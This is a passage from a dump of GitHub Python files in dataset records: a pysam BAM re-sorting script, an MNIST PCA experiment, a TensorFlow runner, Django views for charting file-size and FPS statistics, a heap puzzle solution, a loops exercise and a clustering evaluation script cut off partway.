chroms[:]\n if to_include:\n new_chroms = [(c, x) for (c, x) in new_chroms if c in to_include]\n new_chroms.sort(sort_fn)\n remapper = _id_remapper(chroms, new_chroms)\n new_header = orig.header\n new_header[\"SQ\"] = [h for (_, h) in new_chroms]\n\n new = pysam.Samfile(out_file, \"wb\", header=new_header)\n for (chrom, _) in new_chroms:\n for read in orig.fetch(chrom):\n write = True\n read.rname = remapper[read.rname]\n try:\n read.mrnm = remapper[read.mrnm]\n # read pair is on a chromosome we are not using\n except KeyError:\n assert to_include is not None\n write = False\n if write:\n new.write(read)\n\ndef _id_remapper(orig, new):\n \"\"\"Provide a dictionary remapping original read indexes to new indexes.\n\n When re-ordering the header, the individual read identifiers need to be\n updated as well.\n \"\"\"\n new_chrom_to_index = {}\n for i_n, (chr_n, _) in enumerate(new):\n new_chrom_to_index[chr_n] = i_n\n remap_indexes = {}\n for i_o, (chr_o, _) in enumerate(orig):\n if chr_o in new_chrom_to_index.keys():\n remap_indexes[i_o] = new_chrom_to_index[chr_o]\n remap_indexes[None] = None\n return remap_indexes\n\nclass SortByHeader:\n \"\"\"Provide chromosome sorting to match an existing header.\n \"\"\"\n def __init__(self, base_header):\n self._chrom_indexes = {}\n self.to_include = []\n for i, item in enumerate(base_header[\"SQ\"]):\n self._chrom_indexes[item[\"SN\"]] = i\n self.to_include.append(item[\"SN\"])\n\n def header_cmp(self, one, two):\n return cmp(self._chrom_indexes[one[0]],\n self._chrom_indexes[two[0]])\n\ndef sort_by_karyotype(one, two):\n \"\"\"Sort function to order reads by karyotype.\n \"\"\"\n return cmp(_split_to_karyotype(one[0]),\n _split_to_karyotype(two[0]))\n\ndef _split_to_karyotype(name):\n parts = name.replace(\"chr\", \"\").split(\"_\")\n try:\n parts[0] = int(parts[0])\n except ValueError:\n pass\n # anything with an extension (_random) goes at the end\n if len(parts) > 1:\n parts.insert(0, \"z\")\n return parts\n\nif __name__ == \"__main__\":\n main(*sys.argv[1:])\n\n","repo_name":"chapmanb/bcbb","sub_path":"nextgen/scripts/utils/resort_bam_karyotype.py","file_name":"resort_bam_karyotype.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"48"}
{"seq_id":"31564248730","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom numpy import linalg as la\nimport struct\nfrom array import array\nimport matplotlib.pyplot as plt\nfrom os.path import join\n#from scipy.linalg import 
eigh\n#from sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\n#from sklearn import decomposition\nfrom math import sqrt\nnp.random.seed(2)\n\n#Constants for PCA\nD = 5\nM = 3\nK = 10\ndimRed = [1, 2, 8, 16, 32, 64, 128, 256, 612, 783]\n\ndef runTest():\n #testImageFile = 't10k-images.idx3-ubyte'\n #testLabelFile = 't10k-labels.idx1-ubyte'\n trainImageFile = 'train-images.idx3-ubyte'\n trainLabelFile = 'train-labels.idx1-ubyte'\n trainImages, trainLabels = readImagesAndLabels(trainLabelFile, trainImageFile)\n #testImages, testLabels = readImagesAndLabels(testLabelFile, testImageFile)\n trainImagesSorted = parseImagesIntoArrays(trainImages, trainLabels) \n del trainImageFile, trainLabelFile, trainImages, trainLabels\n #for digit in range(len(trainImagesSorted)):\n # mat = np.array(trainImagesSorted[digit])\n # mat = mat.reshape(len(trainImagesSorted[digit]) ,784)\n # pc, pcmean = pcaViaSVD(mat, K)\n # principal_C.append(pc)\n # pcMeans.append(pcmean)\n #digitNum = 0\n #for digit in pcMeans:\n # #workableArr = np.reshape(digit, (28,28))\n # plt.figure()\n # plt.title(\"Mean of each PC, {}\".format(digitNum))\n # plt.xlabel(\"PC Number\")\n # plt.ylabel(\"Value\")\n # plt.plot(digit)\n # plt.show()\n # digitNum += 1\n nrmsesTotal = []\n for k in range(len(dimRed)):\n #principal_C = []\n #pcMeans = []\n #r2s = []\n nrmses = []\n for digit in range(len(trainImagesSorted)):\n mat = np.array(trainImagesSorted[digit])\n mat = mat.reshape(len(trainImagesSorted[digit]),784)\n pc, pcmean, recon = pcaViaSVD(mat, dimRed[k])\n #principal_C.append(pc)\n #pcMeans.append(pcmean)\n #r2 = 0\n #r2 += r2_score(mat, recon)\n rmse = sqrt(mean_squared_error(mat, recon))\n nrmse = rmse/sqrt(np.mean(mat**2))\n #r2s.append(r2)\n nrmses.append(nrmse)\n nrmsesTotal.append(nrmses)\n for i in range(10):\n nrmseDigit = []\n for n in range(len(nrmsesTotal)):\n nrmseDigit.append(nrmsesTotal[n][i]) \n plt.figure()\n plt.title(\"Normalized Root Mean Square Error for Digit {}\".format(i))\n default_x_ticks = range(len(dimRed))\n plt.xticks(default_x_ticks, dimRed)\n plt.xlabel(\"PC number\")\n plt.ylabel(\"R2\")\n plt.plot(default_x_ticks, nrmseDigit)\n plt.show()\n \n \ndef readImagesAndLabels(labelFile, imageFile):\n path = '..\\\\'\n labelFile = join(path, labelFile)\n imageFile = join(path, imageFile)\n labels = []\n with open(labelFile,'rb') as l:\n magic, size = struct.unpack(\">II\", l.read(8))\n if magic != 2049:\n raise ValueError('Magic number error, expected 2049, got {}'.format(magic))\n labels = array(\"B\", l.read()) \n \n with open(imageFile,'rb') as f:\n magic, size = struct.unpack(\">II\", f.read(8))\n nrows, ncols = struct.unpack(\">II\", f.read(8))\n if magic != 2051:\n raise ValueError('Magic number error, expected 2051, got {}'.format(magic))\n image_data = array(\"B\", f.read())\n images = []\n for i in range(size):\n images.append([0]*nrows*ncols)\n for i in range(size):\n img = np.array(image_data[i*nrows*ncols:(i+1)*nrows*ncols])\n img = img.reshape(1, 784)\n images[i][:] = img\n return images, labels\n \ndef parseImagesIntoArrays(images, labels):\n arrOfImagesSortedByLabel = {}\n for i in range(len(images)):\n if labels[i] in arrOfImagesSortedByLabel:\n arrOfImagesSortedByLabel[labels[i]].append(np.matrix(images[i]))\n else:\n arrOfImagesSortedByLabel[labels[i]] = [np.matrix(images[i])]\n return arrOfImagesSortedByLabel\n \ndef pcaViaSVD(matrix, k):\n #C = np.matmul(matrix.T, matrix)\n #print(\"C = \\n\", C)\n #l, principalA = eigh(C, eigvals=((784-K, 783)))\n #idx = 
l.argsort()[::-1]\n #l, principalA = l[idx], principalA[:, idx]\n #principalA = principalA.T\n #newCoords = np.matmul(principalA, matrix.T)\n #print(\"l = \\n\", l)\n #print(\"V = \\n\", principalA)\n #principalC = matrix.dot(principalA)\n #print(\"Y = \\n\", principalC)\n U, s, Vt = la.svd(matrix, full_matrices=False)\n #V = Vt.T\n S = np.diag(s)\n #PC_k = principalC[:, 0:K]\n US_k = U[:, 0:k].dot(S[0:k, 0:k])\n recon = U[:, :k] @ np.diag(s[:k]) @ Vt[:k, :]\n means = []\n for pc in US_k.T:\n minVal = np.min(pc)\n for e in range(len(pc)):\n val = pc[e]\n newVal = (val-minVal)\n pc[e] = newVal\n maxVal = np.max(pc)\n for e in range(len(pc)):\n val = pc[e]\n newVal = ((val)/maxVal)\n pc[e] = newVal\n #means.append(np.mean(pc))\n\n return US_k, means, recon\n \nif __name__ == \"__main__\":\n runTest()\n ","repo_name":"WolfWindOW/MLDL","sub_path":"MNIST/MNIST.py","file_name":"MNIST.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4296649396","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport os\n\nimport argparse\nimport tensorflow as tf\n\n\nclass BaseRun(object):\n def __init__(self):\n self.ARGS = None\n self.parser_init()\n self.tf_init()\n\n def parser_init(self):\n parser = argparse.ArgumentParser(description='Train global model')\n parser.add_argument('train_or_test', nargs='?', help='choose train or test model', choices=['train', 'test'],\n default='train')\n parser.add_argument('--gpu', help=\"gpu device\", default='4')\n parser.add_argument('--model_id', help=\"model id\", default='0')\n parser.add_argument('--model_ids', help=\"model ids\", default='0,1,2,3')\n parser.add_argument('--data_set', help=\"data_set\", default='en_es')\n self.ARGS = parser.parse_args()\n\n def tf_init(self):\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(self.ARGS.gpu)\n tf.logging.set_verbosity(tf.logging.ERROR)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n return sess\n\n def trainer_init(self):\n NotImplementedError\n\n def model_init(self):\n NotImplementedError\n\n def run(self):\n sess = self.tf_init()\n trainer = self.trainer_init()\n model = self.model_init()\n if self.ARGS.train_or_test == 'train':\n sess.run(tf.global_variables_initializer())\n trainer.train(model, sess)\n else:\n model_ids = [int(item) for item in self.ARGS.model_ids.split(',')]\n trainer.restore_and_test_model(model, sess, model_ids=model_ids)\n","repo_name":"nghuyong/MTL-SLAM","sub_path":"models/base/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"42036682276","text":"import os\nimport statistics\nimport sys\nimport time\nimport random\nfrom datetime import datetime\n\nfrom django import forms\nfrom django.http import HttpResponse, request\nfrom django.shortcuts import render, HttpResponseRedirect\nfrom django.urls import get_resolver, reverse\nfrom django.db.models import Avg\nfrom django.utils.dateparse import parse_datetime\nfrom jinja2 import Environment, FileSystemLoader\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Bar, Line, Page, Tab, HeatMap, Grid\nfrom pyecharts.globals import CurrentConfig\nfrom pyecharts.faker import Faker\n\nfrom .common.util.file import (parse_file_size_int_to_str,\n parse_file_size_str_to_int)\nfrom .models import DataFile, 
DataFileRecord, StatFileRecord\n\nCurrentConfig.GLOBAL_ENV = Environment(\n loader=FileSystemLoader(\"stats/templates/stats/\"))\nCurrentConfig.ONLINE_HOST = '/static/stats/'\n\n\ndef index(request):\n context = {'url_list': set(v[1].replace(\n 'stats/', '') for k, v in get_resolver(None).reverse_dict.items() if '$' not in v[1])}\n return render(request, 'stats/index.html', context)\n\n\ndef get_changed_data_files(datatime):\n records = DataFileRecord.objects.filter(date_time__date=datatime.date())\n\n ret = []\n for r in records:\n pre_day_rec = DataFileRecord.objects.filter(\n data_file=r.data_file, date_time__lt=r.date_time.date()).order_by('date_time').first()\n if not pre_day_rec:\n ret.append((r.data_file.full_name, r.size))\n else:\n ret.append((r.data_file.full_name, r.size - pre_day_rec.size))\n\n return ret\n\n\ndef data_file_changes(request):\n date = request.GET.get('date', '')\n if date == '':\n date = datetime.today()\n else:\n try:\n date = datetime.strptime(date + ' 23:59:59', \"%Y-%m-%d %H:%M:%S\")\n except ValueError as e:\n pass\n if isinstance(date, datetime):\n datas = get_changed_data_files(date)\n datas = sorted(datas, key=lambda d: d[1], reverse=True)\n datas = [\n {'file_name': k, 'size': parse_file_size_int_to_str(v)} for k, v in datas]\n context = {'d': datas}\n return render(request, 'stats/table.html', context)\n else:\n return HttpResponse('Wrong date parameter')\n\n\ndef data_file_list(request):\n file_name_count = request.GET.get('count', '')\n if file_name_count is not None and file_name_count.isnumeric():\n file_name_count = int(file_name_count)\n else:\n file_name_count = 10\n\n data_files = DataFile.objects.all()\n datas = []\n for obj in data_files:\n datas.append({'file_name': obj.full_name, 'size': obj.current_size()})\n datas = sorted(datas, key=lambda d: d['size'], reverse=True)\n datas = [{'file_name': obj['file_name'], 'size': parse_file_size_int_to_str(\n obj['size'])} for obj in datas][:file_name_count]\n context = {'d': datas}\n return render(request, 'stats/table.html', context)\n\n\ndef data_file_info(request):\n file_names = request.GET.getlist('file_name')\n if not file_names:\n return HttpResponse(\"file_name parameter missing\")\n\n tab = Tab()\n\n for file_name in file_names:\n data_file = DataFile.objects.filter(file_name=file_name).first()\n if not data_file:\n return HttpResponse(f\"Can not find {file_name}\")\n\n data_file_records = DataFileRecord.objects.filter(\n data_file=data_file).order_by('date_time')\n if len(data_file_records) == 0:\n return HttpResponse(f\"No data file record for {file_name}\")\n\n date_list = []\n size_list = []\n for r in data_file_records:\n size_list.append(max(round(r.size / 1024 / 1024, 2), 0.01))\n date_list.append(r.date_time.date())\n\n bar = (\n Bar()\n .add_xaxis(date_list)\n .add_yaxis(file_name, size_list)\n .set_global_opts(title_opts=opts.TitleOpts(title=\"Size(MB)\"))\n )\n tab.add(bar, file_name)\n return HttpResponse(tab.render_embed())\n\n\ndef handle_uploaded_data_file(f):\n lines = []\n for chunk in f.chunks():\n for line in chunk.splitlines():\n if line != '':\n lines.append(line)\n\n version = lines[0].decode('utf-8').split('_')[0]\n date_time_str = lines[1].decode('utf-8').replace('/', '-')\n\n for line in lines[2:]:\n full_name, size_str = line.decode('utf-8').split(',', 2)\n full_name = full_name.replace('\\\\', '/').replace('//', '/')\n full_name = full_name.split('/ns/data/')[1]\n\n data_file_created = False\n new_record_datetime = parse_datetime(date_time_str)\n new_record_size = 
parse_file_size_str_to_int(size_str)\n data_file = DataFile.objects.filter(full_name=full_name).first()\n if not data_file:\n data_file = DataFile(full_name=full_name,\n file_name=os.path.basename(full_name))\n data_file.save()\n data_file_created = True\n\n create_data_file_record = False\n if data_file_created:\n create_data_file_record = True\n else:\n # check and update same day record\n same_day_data_file_record = DataFileRecord.objects.filter(data_file=data_file,\n date_time__date=new_record_datetime.date()).first()\n if same_day_data_file_record:\n if new_record_size != same_day_data_file_record.size and new_record_datetime > same_day_data_file_record.date_time:\n same_day_data_file_record.size = new_record_size\n same_day_data_file_record.date_time = new_record_datetime\n same_day_data_file_record.save()\n else:\n # check the closest earlier/later day\n pre_day_rec = DataFileRecord.objects.filter(data_file=data_file,\n date_time__lt=new_record_datetime.date()).order_by('-date_time').first()\n next_day_rec = DataFileRecord.objects.filter(data_file=data_file,\n date_time__gt=new_record_datetime.date()).order_by(\n 'date_time').first()\n if not pre_day_rec and not next_day_rec:\n create_data_file_record = True\n elif pre_day_rec and pre_day_rec.size != new_record_size and (not next_day_rec or next_day_rec.size != new_record_size):\n create_data_file_record = True\n elif next_day_rec and next_day_rec.size != new_record_size and (not pre_day_rec or pre_day_rec.size != new_record_size):\n create_data_file_record = True\n # same size record in a row, keep the first one\n if next_day_rec and next_day_rec.size == new_record_size:\n next_day_rec.date_time = new_record_datetime\n next_day_rec.save()\n\n if create_data_file_record:\n data_file_record = DataFileRecord(size=new_record_size,\n date_time=new_record_datetime,\n data_file=data_file)\n data_file_record.save()\n\n\nclass UploadDataFileForm(forms.Form):\n file = forms.FileField()\n\n\ndef add_data_file_record(request):\n if request.method == 'POST':\n form = UploadDataFileForm(request.POST, request.FILES)\n if form.is_valid():\n start = time.time()\n handle_uploaded_data_file(request.FILES['file'])\n return HttpResponse(f'success, time elapsed:{time.time() - start}')\n else:\n form = UploadDataFileForm()\n return render(request, 'stats/upload.html', {'form': form, 'title': 'Add data file record'})\n\n\ndef phase_record(request):\n phase_name = request.GET.get('phase_name', '')\n sub_phase_name = request.GET.get('sub_phase_name', '')\n date_time_str = request.GET.get('date_time_str', '')\n\n if not phase_name or not sub_phase_name:\n return HttpResponse('Invalid parameters')\n\n statFileRecord = StatFileRecord.objects.filter(\n phase_name=phase_name, sub_phase_name=sub_phase_name, date_time__date=parse_datetime(date_time_str).date()).first()\n # bail out when no record matches (the original check was inverted and\n # would have dereferenced a None record below)\n if not statFileRecord:\n return HttpResponse(\"no record\")\n\n lines = statFileRecord.file.open(mode=\"r\").read().splitlines()\n statFileRecord.file.close()\n\n frames = []\n cpu_times = []\n gpu_times = []\n drawcall_cnts = []\n\n # Frame_Time(ms),CPU_Time(ms),GPU_Time(ms),Draw_Call(100),ESP2D(ms),SORT3D(ms),EVENTS\n for line in lines[2:]:\n attrs = line.split(',')\n frames.append(round(1000 / float(attrs[0]), 2))\n cpu_times.append(round(float(attrs[1]), 2))\n gpu_times.append(round(float(attrs[2]), 2))\n drawcall_cnts.append(round(float(attrs[3]), 2))\n\n page = Page()\n opt_avg = opts.MarkPointOpts(data=[opts.MarkPointItem(type_=\"average\")])\n\n perf_line = (\n 
Line(init_opts=opts.InitOpts(width=\"1800px\", height=\"900px\"))\n .add_xaxis(list(range(1, len(frames))))\n .add_yaxis(\"frames\", frames, markpoint_opts=opt_avg)\n .add_yaxis(\"cpu_times\", cpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"gpu_times\", gpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"drawcall_cnts\", drawcall_cnts, markpoint_opts=opt_avg)\n .set_global_opts(\n title_opts=opts.TitleOpts(title=f'{phase_name}:{sub_phase_name}'),\n yaxis_opts=opts.AxisOpts(max_=100),\n datazoom_opts=[opts.DataZoomOpts(\n range_start=1, range_end=sys.maxsize)]\n )\n )\n page.add(perf_line)\n\n return HttpResponse(page.render_embed())\n\n\ndef phase_stat(request):\n phase_name = request.GET.get('phase_name', '')\n sub_phase_name = request.GET.get('sub_phase_name', '')\n\n if not phase_name or not sub_phase_name:\n return HttpResponse('Invalid paramaters')\n\n dates = []\n frames = []\n cpu_times = []\n gpu_times = []\n drawcall_cnts = []\n\n statFileRecords = StatFileRecord.objects.filter(\n phase_name=phase_name, sub_phase_name=sub_phase_name).order_by('date_time')\n for statFileRecord in statFileRecords:\n dates.append(statFileRecord.date_time.date())\n frames.append(round(statFileRecord.avg_fps, 2))\n cpu_times.append(round(statFileRecord.avg_cpu, 2))\n gpu_times.append(round(statFileRecord.avg_gpu, 2))\n drawcall_cnts.append(round(statFileRecord.avg_drawcall, 2))\n\n if len(dates) > 0:\n page = Page()\n opt_avg = opts.MarkPointOpts(\n data=[opts.MarkPointItem(type_=\"average\")])\n\n perf_line = (\n Line(init_opts=opts.InitOpts(width=\"1800px\", height=\"900px\"))\n .add_xaxis(dates)\n .add_yaxis(\"frames\", frames, markpoint_opts=opt_avg)\n .add_yaxis(\"cpu_times\", cpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"gpu_times\", gpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"drawcall_cnts\", drawcall_cnts, markpoint_opts=opt_avg)\n .set_global_opts(\n title_opts=opts.TitleOpts(\n title=f'{phase_name}:{sub_phase_name}'),\n yaxis_opts=opts.AxisOpts(max_=100),\n datazoom_opts=[opts.DataZoomOpts(\n range_start=1, range_end=sys.maxsize)]\n )\n )\n page.add(perf_line)\n\n return HttpResponse(page.render_embed())\n else:\n return HttpResponse(\"no recored\")\n\n\ndef create_uploaded_stats_file(file, version, phase_name, sub_phase_name, date_time_str):\n statFileRecord = StatFileRecord.objects.create(\n phase_name=phase_name, sub_phase_name=sub_phase_name, version=version, file=file, date_time=parse_datetime(date_time_str))\n lines = statFileRecord.file.open(mode=\"r\").read().splitlines()\n statFileRecord.file.close()\n\n frames = []\n cpu_times = []\n gpu_times = []\n drawcall_cnts = []\n\n # Frame_Time(ms),CPU_Time(ms),GPU_Time(ms),Draw_Call(100),ESP2D(ms),SORT3D(ms),EVENTS\n for line in lines[2:]:\n attrs = line.split(',')\n frames.append(float(attrs[0]))\n cpu_times.append(float(attrs[1]))\n gpu_times.append(float(attrs[2]))\n drawcall_cnts.append(float(attrs[3]))\n\n statFileRecord.avg_fps = 1000 / statistics.mean(frames)\n statFileRecord.avg_cpu = statistics.mean(cpu_times)\n statFileRecord.avg_gpu = statistics.mean(gpu_times)\n statFileRecord.avg_drawcall = statistics.mean(drawcall_cnts)\n statFileRecord.save()\n\n print(f'Added stat: P{phase_name} {sub_phase_name} {date_time_str}')\n\n\nclass UploadStatsFileForm(forms.Form):\n files = forms.FileField(\n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n\ndef add_stats_file_record(request):\n if request.method == 'POST':\n form = UploadStatsFileForm(request.POST, request.FILES)\n if form.is_valid():\n start = 
time.time()\n\n files = request.FILES.getlist('files')\n\n for file in files:\n for chunk in file.chunks():\n lines = chunk.splitlines()[:2]\n version = lines[0].decode('utf-8').split('_')[0]\n date_time_str = lines[1].decode('utf-8').replace('/', '-')\n break\n phase_name, sub_phase_name = file.name.replace(\n '.csv', '').split('-')\n\n create_uploaded_stats_file(\n file, version, phase_name, sub_phase_name, date_time_str)\n return HttpResponse(f'Upload finished,time elapsed:{round(time.time() - start, 2)}')\n else:\n form = UploadStatsFileForm()\n return render(request, 'stats/upload.html', {'form': form, 'title': 'Add fps record'})\n\ndef get_phase_avg_fps(date, phase_name, sub_phase_name):\n avg_fps = StatFileRecord.objects.filter(\n phase_name=phase_name, sub_phase_name=sub_phase_name, date_time__date=date).values('avg_fps').aggregate(Avg('avg_fps'))\n if len(avg_fps.values()) > 0:\n return list(avg_fps.values())[0]\n else:\n return 0\n\n\ndef phase_fps_heatmap(request):\n phases = StatFileRecord.objects.values_list(\n 'phase_name', 'sub_phase_name').distinct()\n date_times = StatFileRecord.objects.values_list(\n 'date_time', flat=True).distinct()\n dates = sorted(list({item.date() for item in date_times}))\n if len(dates) == 0:\n return HttpResponse('No records for fps')\n # return HttpResponse(f'phase num:{len(phases)} date_time num:{len(dates)}\\n' + '\\n'.join( [f'{t[0]} {t[1]}' for t in list(phases)]), content_type=\"text/plain\")\n # print(f'phase num:{len(phases)} date_time num:{len(dates)}')\n # print('P100', '140_30_A_RobotM_CR_GuruBattle', get_phase_avg_fps(parse_datetime('2021-11-26 0:0:0'), 'P100', '140_30_A_RobotM_CR_GuruBattle'))\n\n latest_date = dates[-1]\n latest_fps_list = []\n for phase_index, phase_info in enumerate(phases):\n latest_fps_list.append((phase_info[0], phase_info[1], get_phase_avg_fps(latest_date, phase_info[0], phase_info[1])))\n latest_fps_list.sort(key=lambda x: x[2], reverse=True)\n\n fps_datas = []\n for date_index, date in enumerate(dates):\n for phase_index, phase_info in enumerate(latest_fps_list):\n fps_datas.append([date_index, phase_index, round(get_phase_avg_fps(date, phase_info[0], phase_info[1]), 2)])\n c = (\n HeatMap()\n .add_xaxis(dates)\n .add_yaxis(\n series_name=\"phases\", \n yaxis_data=[f'{t[0]} {t[1]}' for t in latest_fps_list], \n value=fps_datas,\n label_opts=opts.LabelOpts(\n is_show=True, color=\"#fff\", position=\"inside\"\n ), \n )\n .set_global_opts(\n legend_opts=opts.LegendOpts(is_show=False),\n title_opts=opts.TitleOpts(title=\"FPS HeatMap\"),\n yaxis_opts=opts.AxisOpts(axislabel_opts={\"interval\":\"0\"}),\n visualmap_opts=opts.VisualMapOpts(\n min_=0, max_=30, is_calculable=True, orient=\"horizontal\", pos_left=\"center\",\n range_color=[\"#d94e5d\"]* 28 + [\"#eac763\", \"#50a3ba\"]\n ),\n )\n )\n\n grid = Grid(init_opts=opts.InitOpts(width=\"1200px\", height=\"800px\"))\n grid.add(c, grid_opts=opts.GridOpts(pos_left=260))\n return HttpResponse(grid.render_embed())\n\n","repo_name":"superzscy/django_data_visualization_proj","sub_path":"stats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387503094","text":"import heapq\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\ndata = list(map(int, input().split()))\nanswer = 0\nheapq.heapify(data)\nfor _ in range(m):\n first = heapq.heappop(data)\n seoncd = heapq.heappop(data)\n heapq.heappush(data, first + 
seoncd)\n heapq.heappush(data, first + seoncd)\n\nprint(sum(data))","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/15903/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14532513656","text":"# names=['Aung Aung','Kyaw Kyaw','Su Su','Ma Ma'];\n\n# for loop\n# for name in names :\n# if name=='Su Su' :\n# print(f'{name} is constructor.');\n# break\n# else :\n# print(f'{name} is student.');\n\n\n#while loop\nnum=0\nwhile num<10 :\n if num>5 :\n break;\n if num%2 == 0 :\n print(f'{num} is even number.');\n else :\n print(f'{num} is odd number.');\n num+=1;","repo_name":"NangSengHarn/python-learning","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1570234803","text":"\"\"\" Evaluating the effectiveness of a variety of clustering algorithms \n\"\"\"\n__author__ = \"Rohan Pandit\" \n\nimport sys\nfrom itertools import cycle\nfrom time import time\nimport os\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.constants import k as k_b\nfrom sklearn import cluster\nfrom sklearn.neighbors import BallTree\nfrom sklearn.utils import extmath\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.cluster._dbscan_inner import dbscan_inner\n\nfilename = sys.argv[1]\n\nK_MEANS \t\t= True\nAFFINITY_PROP \t= False\nMEAN_SHIFT \t\t= True\nAGGLOMERATIVE \t= True\nDBSCAN \t\t\t= True\n\n#Example Usage: python cluster.py 5000_SOD1\ndef main():\n\t####################### Loading Files ##########################\n\tpdb_name = filename.split(\"_\")[0]\n\n\talgorithms = ['k_means', 'affinity_prop', 'affinity_prop_eps', \n\t\t\t\t 'mean_shift', 'mean_shift_eps', 'agglomerative',\n\t\t\t\t 'DBSCAN', 'DBSCAN_eps', ]\n\tfor name in algorithms:\n\t\tif not os.path.exists(\"output/%s/%s\"%(filename, name)):\t\n\t\t\tos.makedirs(\"output/%s/%s\"%(filename, name))\n\n\tprojections = np.load(\"output/%s/projections.npy\" % filename)[:, :2]\n\tRMSDs = np.load(\"output/%s/RMSD.npy\" % filename)\n\tepsilons = np.load(\"output/%s/epsilons.npy\" % filename)\n\teigenvals = np.load(\"output/%s/eigenvals.npy\" % filename)\n\n\t########################## K-Means ############################\n\tif K_MEANS:\n\t\tt0 = time()\n\t\tprint(\"Starting K-Means for\", filename)\n\n\t\tk = cluster.KMeans(n_clusters=10, n_jobs=-1).fit(RMSDs)\n\n\t\tnp.save(\"output/%s/k_means/cluster_centers\"%filename, k.cluster_centers_)\n\t\tnp.save(\"output/%s/k_means/labels\"%filename, k.labels_)\n\n\t\tprint(\"num clusters: \", k.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\t\t#cluster_plot(projections, labels)\n\n\t################### Affinity Propagation #######################\n\tif AFFINITY_PROP:\n\t\tt0 = time()\n\t\tprint(\"Starting Affinity Propagation for\", filename)\n\n\t\taf = cluster.AffinityPropagation(verbose=True, affinity='precomputed').fit(RMSDs)\n\n\t\tnp.save(\"output/%s/affinity_prop/cluster_centers\"%filename, af.cluster_centers_)\n\t\tnp.save(\"output/%s/affinity_prop/labels\"%filename, af.labels_)\n\n\t\tprint(\"num clusters: \", af.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t################ Affinity Propagation with Epsilons ###############\n\tif AFFINITY_PROP:\n\t\tt0 = 
time()\n\t\tprint(\"Starting Affinity Propagation with epsilons for\", filename)\n\n\t\taf = cluster.AffinityPropagation(preference=epsilons, verbose=True, \n\t\t\t\t\t\t\t\t\t\t\taffinity='precomputed').fit(RMSDs)\n\n\t\tnp.save(\"output/%s/affinity_prop_eps/cluster_centers\"%filename, af.cluster_centers_)\n\t\tnp.save(\"output/%s/affinity_prop_eps/labels\"%filename, af.labels_)\n\n\t\tprint(\"num clusters: \", af.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t############################ Mean Shift #############################\n\tif MEAN_SHIFT:\n\t\tt0 = time()\n\t\tprint(\"Starting Mean Shift for\", filename)\n\n\t\tms = cluster.MeanShift(bandwidth=np.mean(RMSDs), bin_seeding=False).fit(RMSDs)\n\n\t\tnp.save(\"output/%s/mean_shift/cluster_centers\"%filename, ms.cluster_centers_)\n\t\tnp.save(\"output/%s/mean_shift/labels\"%filename, ms.labels_)\n\n\t\tprint(\"num clusters: \", ms.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t####################### Mean Shift with Epsilons #########################\n\tif MEAN_SHIFT:\n\t\tt0 = time()\n\t\tprint(\"Starting Mean Shift with epsilons for\", filename)\n\n\t\tcluster_centers, labels = variable_bw_mean_shift(RMSDs, bandwidth_array=epsilons)\n\n\t\tnp.save(\"output/%s/mean_shift_eps/cluster_centers\"%filename, cluster_centers)\n\t\tnp.save(\"output/%s/mean_shift_eps/labels\"%filename, labels)\n\n\t\tprint(\"num clusters: \", cluster_centers.shape[0])\n\t\tprint(\"num clusters: \", len(set(labels)))\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t##### Density-Based Spatial Clustering of Applications with Noise (DBSCAN) ####\n\tif DBSCAN:\n\t\tt0 = time()\n\t\tprint(\"Starting DBSCAN for\", filename)\n\n\t\td = cluster.DBSCAN(eps=np.mean(RMSDs), metric='precomputed',\n\t\t\t\t\t\t\talgorithm='ball_tree', min_samples=3).fit(RMSDs)\n\n\t\tnp.save(\"output/%s/DBSCAN/cluster_centers\"%filename, d.components_)\n\t\tnp.save(\"output/%s/DBSCAN/labels\"%filename, d.labels_)\n\n\t\tprint(\"num clusters: \", len(set(d.labels_)))\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t############################ DBSCAN with Epsilons ###########################\n\tif DBSCAN:\n\t\tt0 = time()\n\t\tprint(\"Starting DBSCAN with epsilons for\", filename)\n\n\t\tcluster_centers, labels = variable_eps_DBSCAN(RMSDs, epsilons, min_samples=2)\n\n\t\tnp.save(\"output/%s/DBSCAN_eps/cluster_centers\"%filename, cluster_centers)\n\t\tnp.save(\"output/%s/DBSCAN_eps/labels\"%filename, labels)\n\n\t\t# report on the labels returned by this run (the original printed\n\t\t# d.labels_ from the previous plain-DBSCAN 